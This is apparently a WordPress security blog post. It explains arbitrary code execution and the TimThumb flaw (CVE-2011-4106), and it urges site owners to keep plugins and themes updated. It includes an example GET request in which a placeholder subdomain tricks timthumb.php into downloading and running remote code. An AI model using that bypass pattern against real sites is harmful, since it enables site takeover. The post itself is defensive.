What is 🔥 Arbitrary code execution and How to protect WordPress from ARE attacks

Arbitrary Code Execution is a process that enables an attacker to execute arbitrary code on a WordPress website.

Hackers often break into a website by exploiting outdated plugins, themes, and even the WordPress core. They then upload a PHP file containing malicious codes.

They use arbitrary codes to navigate and inspect your files and find ways to gain complete access to your website. Hackers can then use these commands to erase files, steal sensitive information and sell it on the black market. They can use your website’s resources to send spam emails and perform cyber attacks on other websites.


Exploits that allow arbitrary code execution can be devastating to your WordPress website and potentially harm you in the following ways:

Once hackers have gained access to your website, they use arbitrary code to explore and examine your files, looking for ways to obtain complete control of your WordPress website or hosting account.

Hackers can change or destroy information, as well as steal and sell critical data on the black market, jeopardizing users’ privacy and integrity.

They can use your site’s resources to launch hack attacks or send spam emails to other websites, which can in a domino like effect have the following consequences:

  • SEO ranking can decrease and Google might even blacklist your website
  • The site traffic might plummet and revenue will take a hit
  • Web hosting provider may suspend your account for malicious activities

Recovering from such hacks is expensive and tedious, and for many, next to impossible.


🔴 CVE-2011-4106 – One of the most famous ARE attacks in the WordPress ecosystem during 2011-2014 was the exploitation of the TimThumb – a simple PHP script used for resizing images.

TimThumb’s main feature was to build thumbnails of images hosted on trustworthy third-party websites by downloading them and storing them in a cache directory.

This feature worked using a simple GET request:

timthumb.php?src=http://trusted-site.tld/image.gif

The script checked if the GET request is coming from a trusted source – e.g. domains that start with blogger.com or wordpress.com, so it could be tricked by sending a request from a subdomain like blogger.wpxss.com

timthumb.php?src=http://trusted-site.XXXXX.tld/image.gif

That way, hackers bypassed the trusted site check and with a single GET request downloaded & executed arbitrary code on the target website.

Event today, a decade later, We can still see bots sending GET requests to timthumb.php and thumb.php files on WordPress websites, attempting to exploit this old vulnerability.


Arbitrary Code Execution on WordPress vulnerabilities are difficult to identify manually, so I propose scanning your website for known ARE vulnerabilities with a plugin like Malcare.


short answer: update

When developers discover security problems in their plugins and themes, they are aware that the software might be used to execute arbitrary code on a WordPress site. As a result, they issue security updates to address the flaw.

You’re leaving the door open for hackers to target your WordPress website if you don’t update. The simple line is that you should never miss an update.

Was this post helpful?

Leave a Comment